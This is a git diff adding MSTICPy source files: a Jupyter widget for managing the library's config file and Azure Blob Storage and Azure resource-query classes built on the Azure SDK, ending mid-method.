+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Msticpy Config class."""
+import io
+import os
+import pprint
+from contextlib import redirect_stdout
+from datetime import datetime
+from pathlib import Path
+from typing import Any, Dict, Optional
+
+import ipywidgets as widgets
+import yaml
+from IPython.display import display
+
+from .._version import VERSION
+
+try:
+    from ..common.keyvault_client import BHKeyVaultClient, MsticpyKeyVaultConfigError
+
+    _KEYVAULT = True
+except ImportError:
+    _KEYVAULT = False
+from ..common.pkg_config import refresh_config, validate_config
+from .comp_edit import CompEditStatusMixin, CompEditDisplayMixin
+from .file_browser import FileBrowser
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_CONFIG_MAP = {
+    "resource_group": "ResourceGroup",
+    "subscription_id": "SubscriptionId",
+    "tenant_id": "TenantId",
+    "workspace_id": "WorkspaceId",
+}
+
+_TXT_STYLE = {
+    "style": {"description_width": "150px"},
+    "layout": widgets.Layout(width="99%"),
+}
+
+
+# pylint: disable=too-many-instance-attributes
+class MpConfigFile(CompEditStatusMixin, CompEditDisplayMixin):
+    """
+    MSTICPy Configuration management class.
+
+    Use the functions from the commandline or display
+    in a Jupter notebook to use interactive version.
+
+    """
+
+    def __init__(
+        self, file: Optional[str] = None, settings: Optional[Dict[str, Any]] = None
+    ):
+        """
+        Create an instance of the MSTICPy Configuration helper class.
+
+        Parameters
+        ----------
+        file : Optional[str], optional
+            config file to load, by default None
+        settings : Optional[Dict[str, Any]], optional
+            setting dict to load, by default None
+
+        """
+        self.settings = settings or {}
+
+        self.kv_client: Any = None
+        self.mp_config_def_path = os.environ.get(
+            "MSTICPYCONFIG", "./msticpyconfig.yaml"
+        )
+        self._current_file = None
+
+        # Set up controls
+        self.file_browser = FileBrowser(select_cb=self.load_from_file)
+        self.txt_viewer = widgets.Textarea(
+            layout=widgets.Layout(width="99%", height="300px")
+        )
+        self.btn_close = widgets.Button(description="Close")
+        self.btn_close.on_click(self._close_view)
+
+        self.html_title = widgets.HTML("<h3>MSTICPy settings</h3>")
+        self.txt_current_file = widgets.Text(description="Current file", **_TXT_STYLE)
+        self.txt_current_file.value = self.current_file or ""
+        self.txt_current_file.observe(self._update_curr_file, "value")
+        self.txt_curr_mpconfig = widgets.Text(
+            description="Value of MSTICPCONFIG", **_TXT_STYLE
+        )
+        self.txt_curr_mpconfig.value = self.mp_config_def_path
+        self.txt_curr_mpconfig.disabled = True
+
+        self.buttons: Dict[str, widgets.Button] = {}
+        self.btn_pane = self._setup_buttons()
+        self.info_pane = widgets.VBox(
+            [
+                self.txt_current_file,
+                self.txt_curr_mpconfig,
+            ],
+            layout=self.border_layout("60%"),
+        )
+        self.viewer = widgets.VBox([])
+        self.layout = widgets.VBox(
+            [
+                self.html_title,
+                widgets.HBox([self.info_pane, self.btn_pane]),
+                self.viewer,
+            ],
+            layout=self.border_layout("99%"),
+        )
+
+        self.current_file = file
+        if file and Path(file).is_file():
+            self.load_from_file(file)
+
+    @property
+    def current_file(self):
+        """Return currently loaded file path."""
+        return self._current_file
+
+    @current_file.setter
+    def current_file(self, file_name: str):
+        self._current_file = str(file_name) if file_name else None
+        self.txt_current_file.value = self._current_file or ""
+
+    def _update_curr_file(self, change):
+        del change
+        self.current_file = self.txt_current_file.value
+
+    def load_default(self):
+        """Load default settings specified by MSTICPYCONFIG env var."""
+        if self.mp_config_def_path:
+            self.load_from_file(self.mp_config_def_path)
+            self.current_file = self.mp_config_def_path
+
+    def browse_for_file(self, show: bool = True):
+        """Open the browser to browser/search fr a file."""
+        self.viewer.children = [self.file_browser.layout, self.btn_close]
+        if show:
+            display(self.viewer)
+
+    def load_from_file(self, file: str):
+        """Load settings from `file`."""
+        self.settings = self._read_mp_config(file)
+        self.current_file = file
+
+    def view_settings(self, show: bool = True):
+        """View the current settings as text."""
+        self.txt_viewer.value = pprint.pformat(self.settings, compact=True)
+        self.viewer.children = [self.txt_viewer, self.btn_close]
+        if show:
+            display(self.viewer)
+
+    def _close_view(self, btn):
+        del btn
+        self.viewer.children = []
+
+    def validate_settings(self, show: bool = True):
+        """Run the validator against currently loaded settings."""
+        results = io.StringIO()
+        with redirect_stdout(results):
+            validate_config(mp_config=self.settings)
+        self.txt_viewer.value = results.getvalue()
+        self.viewer.children = [self.txt_viewer, self.btn_close]
+        if show:
+            display(self.viewer)
+
+    def save_to_file(self, file: str, backup: bool = True):
+        """
+        Save current configuration to `file`.
+
+        Parameters
+        ----------
+        file : str
+            The file path to save to.
+        backup : bool, optional
+            Create a backup file, if overwriting existing file,
+            by default True
+
+        """
+        # remove empty settings sections before saving
+        empty_items = [
+            section for section, settings in self.settings.items() if not settings
+        ]
+        for empty_section in empty_items:
+            del self.settings[empty_section]
+        # create a backup, if required
+        if backup and Path(file).is_file():
+            Path(file).replace(f"{file}.save_{datetime.now().strftime('%H%M%S')}")
+        with open(file, "w", encoding="utf-8") as mp_hdl:
+            yaml.safe_dump(self.settings, mp_hdl)
+
+    def show_kv_secrets(self, show: bool = True):
+        """Show secrets from currently configured Key Vault."""
+        view_text = []
+        if not _KEYVAULT:
+            self.txt_viewer.value = "\n".join(
+                [
+                    "Azure keyvault libraries not found.",
+                    "Please install 'azure_keyvault_secrets' and",
+                    "'azure_mgmt_keyvault'",
+                ]
+            )
+            self.viewer.children = [self.txt_viewer, self.btn_close]
+            if show:
+                display(self.viewer)
+            return
+        if self.kv_client is None:
+            try:
+                self.kv_client = BHKeyVaultClient()
+            except MsticpyKeyVaultConfigError:
+                view_text = ["Key Vault settings have not been configured correctly."]
+        if self.kv_client is not None:
+            try:
+                secrets = self.kv_client.secrets
+            except Exception as err:  # pylint: disable=broad-except
+                view_text.extend(
+                    [
+                        "Could not get secrets list from Key Vault.",
+                        "It is likely that the authentication failed."
+                        f"The exception is show here: {err}",
+                    ]
+                )
+                secrets = []
+
+            for sec_path in secrets:
+                sec_name = sec_path.rsplit("/", maxsplit=1)[-1]
+                try:
+                    sec_result = f"Value: '{self.kv_client.get_secret(sec_name)}'"
+                except Exception:  # pylint: disable=broad-except
+                    sec_result = "Value: Could not display secret"
+                view_text.append(f"Secret '{sec_name}'  {sec_result}")
+        self.txt_viewer.value = "\n".join(view_text)
+        self.viewer.children = [self.txt_viewer, self.btn_close]
+        if show:
+            display(self.viewer)
+
+    def _read_mp_config(self, file):
+        if Path(file).is_file():
+            with open(file, "r", encoding="utf-8") as mp_hdl:
+                try:
+                    return yaml.safe_load(mp_hdl)
+                except yaml.scanner.ScannerError as err:
+                    self.set_status(str(err))
+        raise FileNotFoundError(f"Cannot read file {file}")
+
+    def map_json_to_mp_ws(self):
+        """Map config.json settings to MSTICPy settings."""
+        if "resource_group" in self.settings:
+            ws_settings = {
+                config: self.settings[entry] for entry, config in _CONFIG_MAP.items()
+            }
+            workspace = self.settings.get("workspace_name", "Default")
+            self.settings = {"AzureSentinel": {"Workspaces": {workspace: ws_settings}}}
+            return self.settings
+        return {}
+
+    @staticmethod
+    def refresh_mp_config():
+        """Refresh global MSTICPy settings from config file."""
+        refresh_config()
+
+    def _convert_to_mp(self, btn):
+        del btn
+        self.map_json_to_mp_ws()
+        self.view_settings()
+
+    def _save_file(self, btn):
+        del btn
+        if self.current_file:
+            self.save_to_file(file=self.current_file, backup=True)
+
+    def _btn_func(self, func_name: str):
+        """Wrap methods to be called from button events."""
+
+        def _btn_exec(*args):
+            del args
+            func = getattr(self, func_name)
+            func()
+
+        return _btn_exec
+
+    def _btn_func_no_disp(self, func_name: str):
+        """Wrap methods to be called from button events."""
+
+        def _btn_exec(*args):
+            del args
+            func = getattr(self, func_name)
+            func(show=False)
+
+        return _btn_exec
+
+    def _setup_buttons(self):
+        btn_style = {"layout": widgets.Layout(width="200px")}
+        self.buttons["load"] = widgets.Button(description="Load file", **btn_style)
+        self.buttons["load_def"] = widgets.Button(
+            description="Load default", **btn_style
+        )
+        self.buttons["reload"] = widgets.Button(
+            description="Reload settings", **btn_style
+        )
+        self.buttons["view"] = widgets.Button(description="View Settings", **btn_style)
+        self.buttons["validate"] = widgets.Button(
+            description="Validate Settings", **btn_style
+        )
+        self.buttons["convert"] = widgets.Button(
+            description="Convert to MP", **btn_style
+        )
+        self.buttons["save"] = widgets.Button(description="Save file", **btn_style)
+        self.buttons["showkv"] = widgets.Button(
+            description="Show Key Vault secrets", **btn_style
+        )
+
+        self.buttons["load"].on_click(self._btn_func_no_disp("browse_for_file"))
+        self.buttons["load_def"].on_click(self._btn_func("load_default"))
+        self.buttons["view"].on_click(self._btn_func_no_disp("view_settings"))
+        self.buttons["validate"].on_click(self._btn_func_no_disp("validate_settings"))
+        self.buttons["convert"].on_click(self._convert_to_mp)
+        self.buttons["save"].on_click(self._save_file)
+        self.buttons["reload"].on_click(self._btn_func("refresh_mp_config"))
+        self.buttons["showkv"].on_click(self._btn_func_no_disp("show_kv_secrets"))
+
+        btns1 = widgets.VBox(list(self.buttons.values())[: int(len(self.buttons) / 2)])
+        # flake8: noqa: E203
+        # conflicts with Black formatting
+        btns2 = widgets.VBox(list(self.buttons.values())[int(len(self.buttons) / 2) :])
+        btns_all = widgets.HBox([btns1, btns2])
+        return widgets.VBox(
+            [widgets.Label(value="Operations"), btns_all],
+            layout=self.border_layout("39%"),
+        )
diff --git a/msticpy/data/__init__.py b/msticpy/data/__init__.py
new file mode 100644
index 000000000..e3d834115
--- /dev/null
+++ b/msticpy/data/__init__.py
@@ -0,0 +1,10 @@
+"""Data sub-package."""
+from ..common.exceptions import MsticpyImportExtraError
+
+# flake8: noqa: F403
+from .data_providers import QueryProvider
+from .query_defns import DataEnvironment, DataFamily
+
+from .._version import VERSION
+
+__version__ = VERSION
diff --git a/msticpy/data/azure/__init__.py b/msticpy/data/azure/__init__.py
new file mode 100644
index 000000000..19f3a4b4a
--- /dev/null
+++ b/msticpy/data/azure/__init__.py
@@ -0,0 +1,11 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Data provider sub-package."""
+
+# flake8: noqa: F401
+from .azure_data import AzureData
+from .sentinel_core import MicrosoftSentinel
+from .azure_blob_storage import AzureBlobStorage
diff --git a/msticpy/data/azure/azure_blob_storage.py b/msticpy/data/azure/azure_blob_storage.py
new file mode 100644
index 000000000..4989c6f93
--- /dev/null
+++ b/msticpy/data/azure/azure_blob_storage.py
@@ -0,0 +1,262 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Uses the Azure Python SDK to interact with Azure Blob Storage."""
+import datetime
+from typing import Any, List, Optional
+
+import pandas as pd
+from azure.common.exceptions import CloudError
+from azure.core.exceptions import (
+    ResourceExistsError,
+    ResourceNotFoundError,
+    ServiceRequestError,
+)
+from azure.storage.blob import BlobServiceClient, generate_blob_sas
+
+from ...common.azure_auth import az_connect
+from ...common.azure_auth_core import AzCredentials, AzureCloudConfig
+
+
+class AzureBlobStorage:
+    """Class for interacting with Azure Blob Storage."""
+
+    def __init__(
+        self,
+        abs_name: str = None,
+        connect: bool = False,
+        abs_connection_string: str = None,
+    ):
+        """Initialize connector for Azure Python SDK."""
+        self.connected = False
+        self.abs_site = f"{abs_name}.blob.core.windows.net"
+        self.connection_string = abs_connection_string
+        self.credentials: Optional[AzCredentials] = None
+        self.abs_client: Optional[BlobServiceClient] = None
+        if connect:
+            self.connect()
+
+    def connect(
+        self,
+        auth_methods: List = None,
+        silent: bool = False,
+    ):
+        """Authenticate with the SDK."""
+        self.credentials = az_connect(auth_methods=auth_methods, silent=silent)
+        if not self.credentials:
+            raise CloudError("Could not obtain credentials.")
+        if not self.connection_string:
+            self.abs_client = BlobServiceClient(self.abs_site, self.credentials.modern)
+        else:
+            self.abs_client = BlobServiceClient.from_connection_string(
+                self.connection_string
+            )
+        if not self.abs_client:
+            raise CloudError("Could not create a Blob Storage client.")
+        self.connected = True
+
+    def containers(self) -> pd.DataFrame:
+        """Return containers in the Azure Blob Storage Account."""
+        try:
+            container_list = self.abs_client.list_containers()  # type:ignore
+        except ServiceRequestError as err:
+            raise CloudError(
+                "Unable to connect check the Azure Blob Store account name"
+            ) from err
+        return (
+            _parse_returned_items(  # type:ignore
+                container_list, remove_list=["lease", "encryption_scope"]
+            )
+            if container_list
+            else None
+        )
+
+    def create_container(self, container_name: str, **kwargs) -> pd.DataFrame:
+        """
+        Create a new container within the Azure Blob Storage account.
+
+        Parameters
+        ----------
+        container_name : str
+            The name for the new container.
+        Additional container parameters can be passed as kwargs
+
+        Returns
+        -------
+        pd.DataFrame
+            Details of the created container.
+
+        """
+        try:
+            new_container = self.abs_client.create_container(  # type: ignore
+                container_name, **kwargs
+            )  # type:ignore
+        except ResourceExistsError as err:
+            raise CloudError(f"Container {container_name} already exists.") from err
+        properties = new_container.get_container_properties()
+        return _parse_returned_items([properties], ["encryption_scope", "lease"])
+
+    def blobs(self, container_name: str) -> Optional[pd.DataFrame]:
+        """
+        Get a list of blobs in a container.
+
+        Parameters
+        ----------
+        container_name : str
+            The name of the container to get blobs from.
+
+        Returns
+        -------
+        pd.DataFrame
+            Details of the blobs.
+
+        """
+        container_client = self.abs_client.get_container_client(container_name)  # type: ignore
+        blobs = list(container_client.list_blobs())
+        return _parse_returned_items(blobs) if blobs else None
+
+    def upload_to_blob(
+        self, blob: Any, container_name: str, blob_name: str, overwrite: bool = True
+    ):
+        """
+        Upload a blob of data.
+
+        Parameters
+        ----------
+        blob : Any
+            The data to upload.
+        container_name : str
+            The name of the container to upload the blob to.
+        blob_name : str
+            The name to give the blob.
+        overwrite : bool, optional
+            Whether or not you want to overwrite the blob if it exists, by default True.
+
+        """
+        try:
+            blob_client = self.abs_client.get_blob_client(  # type:ignore
+                container=container_name, blob=blob_name
+            )
+            upload = blob_client.upload_blob(blob, overwrite=overwrite)
+        except ResourceNotFoundError as err:
+            raise CloudError(
+                "Unknown container, check container name or create it first."
+            ) from err
+        if not upload["error_code"]:
+            print("Upload complete")
+        else:
+            raise CloudError(
+                f"There was a problem uploading the blob: {upload['error_code']}"
+            )
+        return True
+
+    def get_blob(self, container_name: str, blob_name: str) -> bytes:
+        """
+        Get a blob from the Azure Blob Storage account.
+
+        Parameters
+        ----------
+        container_name : str
+            The name of the container that holds the blob.
+        blob_name : str
+            The name of the blob to download.
+
+        Returns
+        -------
+        bytes
+            The content of the blob in bytes.
+
+        """
+        blob_client = self.abs_client.get_blob_client(  # type: ignore
+            container=container_name, blob=blob_name
+        )
+        if not blob_client.exists():
+            raise CloudError(f"The blob {blob_name} does not exist in {container_name}")
+        data_stream = blob_client.download_blob()
+        return data_stream.content_as_bytes()
+
+    def delete_blob(self, container_name: str, blob_name: str) -> bool:
+        """
+        Delete a blob from the Azure Blob Storage account.
+
+        Parameters
+        ----------
+        container_name : str
+            The container name that has the blob.
+        blob_name : str
+            The name of the blob to delete.
+        Note deleting a blob also deletes associated snapshots.
+
+        Returns
+        -------
+        bool
+            True if blob successfully deleted
+
+        """
+        blob_client = self.abs_client.get_blob_client(  # type: ignore
+            container=container_name, blob=blob_name
+        )
+        if blob_client.exists():
+            blob_client.delete_blob(delete_snapshots="include")
+        else:
+            raise CloudError(f"The blob {blob_name} does not exist in {container_name}")
+
+        return True
+
+    def get_sas_token(
+        self,
+        container_name: str,
+        blob_name: str,
+        end: datetime.datetime = None,
+        permission: str = "r",
+    ) -> str:
+        """
+        Generate a shared access string (SAS) token for a blob.
+
+        Parameters
+        ----------
+        container_name : str
+            The name of the Azure Blob Storage container that holds the blob.
+        blob_name : str
+            The name of the blob to generate the SAS token for.
+        end : datetime.datetime, optional
+            The datetime the SAS token should expire, by default this is 7 days from now.
+        permission : str, optional
+            The permissions to give the SAS token, by default 'r' for read.
+
+        Returns
+        -------
+        str
+            A URI of the blob with SAS token.
+
+        """
+        start = datetime.datetime.now()
+        if not end:
+            end = start + datetime.timedelta(days=7)
+        key = self.abs_client.get_user_delegation_key(start, end)  # type: ignore
+        abs_name = self.abs_client.account_name  # type: ignore
+        sast = generate_blob_sas(
+            abs_name,
+            container_name,
+            blob_name,
+            user_delegation_key=key,
+            permission=permission,
+            expiry=end,
+            start=start,
+        )
+        suffix = AzureCloudConfig().suffixes.storage_endpoint
+        return f"https://{abs_name}.blob.{suffix}/{container_name}/{blob_name}?{sast}"
+
+
+def _parse_returned_items(items, remove_list: list = None) -> pd.DataFrame:
+    """Parse a list of containers into a DataFrame."""
+    out_items = []
+    for item in items:
+        item = dict(item)
+        if remove_list:
+            for remove_item in remove_list:
+                item.pop(remove_item)
+        out_items.append(item)
+    return pd.json_normalize(out_items)
diff --git a/msticpy/data/azure/azure_data.py b/msticpy/data/azure/azure_data.py
new file mode 100644
index 000000000..e83b2d38d
--- /dev/null
+++ b/msticpy/data/azure/azure_data.py
@@ -0,0 +1,875 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Uses the Azure Python SDK to collect and return details related to Azure."""
+from typing import Optional, Dict, Tuple, List
+import datetime
+
+import attr
+import pandas as pd
+import numpy as np
+
+from azure.mgmt.resource.subscriptions import SubscriptionClient
+from azure.common.exceptions import CloudError
+
+from ...common.azure_auth import (
+    az_connect,
+    AzCredentials,
+    AzureCloudConfig,
+    only_interactive_cred,
+)
+from ...common.cloud_mappings import get_all_endpoints
+
+from ...common.exceptions import (
+    MsticpyAzureConfigError,
+    MsticpyNotConnectedError,
+    MsticpyResourceException,
+    MsticpyImportExtraError,
+)
+
+try:
+    from azure.mgmt.resource import ResourceManagementClient
+    from azure.mgmt.network import NetworkManagementClient
+
+    try:
+        # Try new version but keep backward compat with 1.0.1
+        from azure.mgmt.monitor import MonitorManagementClient
+    except ImportError:
+        from azure.mgmt.monitor import MonitorClient as MonitorManagementClient
+    from azure.mgmt.compute import ComputeManagementClient
+    from azure.mgmt.compute.models import VirtualMachineInstanceView
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without azure packages installed",
+        title="Error importing azure module",
+        extra="azure",
+    ) from imp_err
+
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+_CLIENT_MAPPING = {
+    "sub_client": SubscriptionClient,
+    "resource_client": ResourceManagementClient,
+    "network_client": NetworkManagementClient,
+    "monitoring_client": MonitorManagementClient,
+    "compute_client": ComputeManagementClient,
+}
+
+
+# pylint: disable=too-few-public-methods, too-many-instance-attributes
+# attr class doesn't need a method
+@attr.s
+class Items:
+    """attr class to build resource details dictionary."""
+
+    resource_id = attr.ib()
+    name = attr.ib()
+    resource_type = attr.ib()
+    location = attr.ib()
+    tags = attr.ib()
+    plan = attr.ib()
+    properties = attr.ib()
+    kind = attr.ib()
+    managed_by = attr.ib()
+    sku = attr.ib()
+    identity = attr.ib()
+    state = attr.ib()
+
+
+@attr.s
+class NsgItems:
+    """attr class to build NSG rule dictionary."""
+
+    rule_name = attr.ib()
+    description = attr.ib()
+    protocol = attr.ib()
+    direction = attr.ib()
+    src_ports = attr.ib()
+    dst_ports = attr.ib()
+    src_addrs = attr.ib()
+    dst_addrs = attr.ib()
+    action = attr.ib()
+
+
+@attr.s
+class InterfaceItems:
+    """attr class to build network interface details dictionary."""
+
+    interface_id = attr.ib()
+    private_ip = attr.ib()
+    private_ip_allocation = attr.ib()
+    public_ip = attr.ib()
+    public_ip_allocation = attr.ib()
+    app_sec_group = attr.ib()
+    subnet = attr.ib()
+    subnet_nsg = attr.ib()
+    subnet_route_table = attr.ib()
+
+
+class AzureData:
+    """Class for returning data on an Azure tenant."""
+
+    def __init__(self, connect: bool = False, cloud: str = None):
+        """Initialize connector for Azure Python SDK."""
+        self.az_cloud_config = AzureCloudConfig(cloud)
+        self.connected = False
+        self.credentials: Optional[AzCredentials] = None
+        self.sub_client: Optional[SubscriptionClient] = None
+        self.resource_client: Optional[ResourceManagementClient] = None
+        self.network_client: Optional[NetworkManagementClient] = None
+        self.monitoring_client: Optional[MonitorManagementClient] = None
+        self.compute_client: Optional[ComputeManagementClient] = None
+        self.cloud = cloud or AzureCloudConfig().cloud
+        self.endpoints = get_all_endpoints(self.cloud)  # type: ignore
+        if connect:
+            self.connect()
+
+    def connect(
+        self, auth_methods: List = None, tenant_id: str = None, silent: bool = False
+    ):
+        """
+        Authenticate to the Azure SDK.
+
+        Parameters
+        ----------
+        auth_methods : List, optional
+            list of preferred authentication methods to use, by default None
+        tenant_id : str, optional
+            The tenant to authenticate against. If not supplied, the default
+            tenant for the identity will be used.
+        silent : bool, optional
+            Set true to prevent output during auth process, by default False
+
+        Raises
+        ------
+        CloudError
+            If no valid credentials are found or if subscription client can't be created
+
+        """
+        auth_methods = auth_methods or self.az_cloud_config.auth_methods
+        tenant_id = tenant_id or self.az_cloud_config.tenant_id
+        self.credentials = az_connect(
+            auth_methods=auth_methods, tenant_id=tenant_id, silent=silent
+        )
+        if not self.credentials:
+            raise CloudError("Could not obtain credentials.")
+        self._check_client("sub_client")
+        if only_interactive_cred(self.credentials.modern) and not silent:
+            print("Check your default browser for interactive sign-in prompt.")
+
+        self.sub_client = SubscriptionClient(
+            credential=self.credentials.modern,
+            base_url=self.endpoints.resource_manager,
+            credential_scopes=[self.az_cloud_config.token_uri],
+        )
+        if not self.sub_client:
+            raise CloudError("Could not create a Subscription client.")
+        self.connected = True
+
+    def get_subscriptions(self) -> pd.DataFrame:
+        """
+        Get details of all subscriptions within the tenant.
+
+        Returns
+        -------
+        pd.DataFrame
+            Details of the subscriptions present in the users tenant.
+
+        Raises
+        ------
+        MsticpyNotConnectedError
+            If .connect() has not been called
+
+        """
+        if self.connected is False:
+            raise MsticpyNotConnectedError(
+                "You need to connect to the service before using this function.",
+                help_uri=MsticpyAzureConfigError.DEF_HELP_URI,
+                title="Please call connect() before continuing.",
+            )
+
+        subscription_ids = []
+        display_names = []
+        states = []
+        # pylint: disable=unnecessary-comprehension
+        try:
+            sub_list = list(self.sub_client.subscriptions.list())  # type: ignore
+        except AttributeError:
+            self._legacy_auth("sub_client")
+            sub_list = list(self.sub_client.subscriptions.list())  # type: ignore
+
+        for item in sub_list:  # type: ignore
+            subscription_ids.append(item.subscription_id)
+            display_names.append(item.display_name)
+            states.append(str(item.state))
+
+        return pd.DataFrame(
+            {
+                "Subscription ID": subscription_ids,
+                "Display Name": display_names,
+                "State": states,
+            }
+        )
+
+    def get_subscription_info(self, sub_id: str) -> dict:
+        """
+        Get information on a specific subscription.
+
+        Parameters
+        ----------
+        sub_id : str
+            The ID of the subscription to return details on.
+
+        Returns
+        -------
+        dict
+            Details on the selected subscription.
+
+        Raises
+        ------
+        MsticpyNotConnectedError
+            If .connect() has not been called.
+
+        """
+        if self.connected is False:
+            raise MsticpyNotConnectedError(
+                "You need to connect to the service before using this function.",
+                help_uri=MsticpyAzureConfigError.DEF_HELP_URI,
+                title="Please call connect() before continuing.",
+            )
+        try:
+            sub = self.sub_client.subscriptions.get(sub_id)  # type: ignore
+        except AttributeError:
+            self._legacy_auth("sub_client")
+            sub = self.sub_client.subscriptions.get(sub_id)  # type: ignore
+
+        return {
+            "Subscription ID": sub.subscription_id,
+            "Display Name": sub.display_name,
+            "State": str(sub.state),
+            "Subscription Location": sub.subscription_policies.location_placement_id,
+            "Subscription Quota": sub.subscription_policies.quota_id,
+            "Spending Limit": sub.subscription_policies.spending_limit,
+        }
+
+    def get_resources(  # noqa: MC0001
+        self, sub_id: str, rgroup: str = None, get_props: bool = False
+    ) -> pd.DataFrame:
+        """
+        Return details on all resources in a subscription or Resource Group.
+
+        Parameters
+        ----------
+        sub_id: str
+            The subscription ID to get resources for
+        rgroup: str (Optional)
+            The name of a Resource Group to get resources for
+        get_props: bool (Optional)
+            Set to True if you want to get the full properties of every resource
+            Warning this may be a slow process depending on the number of resources
+
+        Returns
+        -------
+        pd.DataFrame
+            A dataframe of resource details
+
+        """
+        # Check if connection and client required are already present
+        if self.connected is False:
+            raise MsticpyNotConnectedError(
+                "You need to connect to the service before using this function.",
+                help_uri=MsticpyAzureConfigError.DEF_HELP_URI,
+                title="Please call connect() before continuing.",
+            )
+
+        self._check_client("resource_client", sub_id)
+
+        resources = []  # type: List
+        if rgroup is None:
+            for resource in self.resource_client.resources.list():  # type: ignore
+                resources.append(resource)
+        else:
+            for resource in self.resource_client.resources.list_by_resource_group(  # type: ignore
+                rgroup
+            ):
+                resources.append(resource)
+
+        # Warn users about getting full properties for each resource
+        if get_props:
+            print("Collecting properties for every resource may take some time...")
+
+        resource_items = []
+
+        # Get properties for each resource
+        for resource in resources:
+            if get_props:
+                if resource.type == "Microsoft.Compute/virtualMachines":
+                    state = self._get_compute_state(
+                        resource_id=resource.id, sub_id=sub_id
+                    )
+                else:
+                    state = None
+                try:
+                    props = self.resource_client.resources.get_by_id(  # type: ignore
+                        resource.id, "2019-08-01"
+                    ).properties
+
+                except CloudError:
+                    props = self.resource_client.resources.get_by_id(  # type: ignore
+                        resource.id, self._get_api(resource.id, sub_id=sub_id)
+                    ).properties
+            else:
+                props = resource.properties
+                state = None
+
+            # Parse relevent resource attributes into a dataframe and return it
+            resource_details = attr.asdict(
+                Items(
+                    resource.id,
+                    resource.name,
+                    resource.type,
+                    resource.location,
+                    resource.tags,
+                    resource.plan,
+                    props,
+                    resource.kind,
+                    resource.managed_by,
+                    resource.sku,
+                    resource.identity,
+                    state,
+                )
+            )
+            resource_items.append(resource_details)
+
+        return pd.DataFrame(resource_items)
+
+    def get_resource_details(  # noqa: MC0001
+        self, sub_id: str, resource_id: str = None, resource_details: dict = None
+    ) -> dict:
+        """
+        Return the details of a specific Azure resource.
+
+        Parameters
+        ----------
+        resource_id: str, optional
+            The ID of the resource to get details on
+        resource_details: dict, optional
+            If ID is unknown provide the following details:
+                -resource_group_name
+                -resource_provider_namespace
+                -resource_type
+                -resource_name
+                -parent_resource_path
+        sub_id: str
+            The ID of the subscription to get resources from
+
+        Returns
+        -------
+        resource_details: dict
+            The details of the requested resource
+
+        """
+        # Check if connection and client required are already present
+        if self.connected is False:
+            raise MsticpyNotConnectedError(
+                "You need to connect to the service before using this function.",
+                help_uri=MsticpyAzureConfigError.DEF_HELP_URI,
+                title="Please call connect() before continuing.",
+            )
+        self._check_client("resource_client", sub_id)
+
+        # If a resource id is provided use get_by_id to get details
+        if resource_id is not None:
+            try:
+                resource = self.resource_client.resources.get_by_id(  # type: ignore
+                    resource_id, api_version=self._get_api(resource_id, sub_id=sub_id)
+                )
+            except AttributeError:
+                self._legacy_auth("resource_client", sub_id)
+                resource = self.resource_client.resources.get_by_id(  # type: ignore
+                    resource_id, api_version=self._get_api(resource_id, sub_id=sub_id)
+                )
+            if resource.type == "Microsoft.Compute/virtualMachines":
+                state = self._get_compute_state(resource_id=resource_id, sub_id=sub_id)
+            else:
+                state = None
+        # If resource details are provided use get to get details
+        elif resource_details is not None:
+            try:
+                resource = self.resource_client.resources.get(  # type: ignore
+                    resource_details["resource_group_name"],
+                    resource_details["resource_provider_namespace"],
+                    resource_details["parent_resource_path"],
+                    resource_details["resource_type"],
+                    resource_details["resource_name"],
+                    api_version=self._get_api(
+                        resource_provider=(
+                            resource_details["resource_provider_namespace"]
+                            + "/"
+                            + resource_details["resource_type"]
+                        ),
+                        sub_id=sub_id,
+                    ),
+                )
+            except AttributeError:
+                self._legacy_auth("resource_client", sub_id)
+                resource = self.resource_client.resources.get(  # type: ignore
+                    resource_details["resource_group_name"],
+                    resource_details["resource_provider_namespace"],
+                    resource_details["parent_resource_path"],
+                    resource_details["resource_type"],
+                    resource_details["resource_name"],
+                    api_version=self._get_api(
+                        resource_provider=(
+                            resource_details["resource_provider_namespace"]
+                            + "/"
+                            + resource_details["resource_type"]
+                        ),
+                        sub_id=sub_id,
+                    ),
+                )
+            state = None
+        else:
+            raise ValueError("Please provide either a resource ID or resource details")
+
+        # Parse relevent details into a dictionary to return
+        resource_details = attr.asdict(
+            Items(
+                resource.id,
+                resource.name,
+                resource.type,
+                resource.location,
+                resource.tags,
+                resource.plan,
+                resource.properties,
+                resource.kind,
+                resource.managed_by,
+                resource.sku,
+                resource.identity,
+                state,
+            )
+        )
+
+        return resource_details
+
+    def _get_api(  # noqa: MC0001
+        self, resource_id: str = None, sub_id: str = None, resource_provider: str = None
+    ) -> str:
+        """
+        Return the latest avaliable API version for the resource.
+
+        Parameters
+        ----------
+        resource_id: str, optional
+            The ID of the resources to get an API version for
+        sub_id: str, optional
+            The ID of the subscription to get details from
+        resource_provider: str, optional
+            The resource provider namespace and service to get an API version for
+
+        Returns
+        -------
+        api_ver: str
+            The latest avaliable non-preview API version
+
+        """
+        # Check if connection and client required are already present
+        if self.connected is False:
+            raise MsticpyNotConnectedError(
+                "You need to connect to the service before using this function.",
+                help_uri=MsticpyAzureConfigError.DEF_HELP_URI,
+                title="Please call connect() before continuing.",
+            )
+
+        self._check_client("resource_client", sub_id)  # type: ignore
+
+        # Normalize elements depending on user input type
+        if resource_id is not None:
+            try:
+                namespace = resource_id.split("/")[6]
+                service = resource_id.split("/")[7]
+            except IndexError as idx_err:
+                raise MsticpyResourceException(
+                    "Provided Resource ID isn't in the correct format.",
+                    "It should look like:",
+                    "/subscriptions/SUB_ID/resourceGroups/RESOURCE_GROUP/"
+                    + "providers/NAMESPACE/SERVICE_NAME/RESOURCE_NAME ",
+                ) from idx_err
+
+        elif resource_provider is not None:
+            try:
+                namespace = resource_provider.split("/")[0]
+                service = resource_provider.split("/")[1]
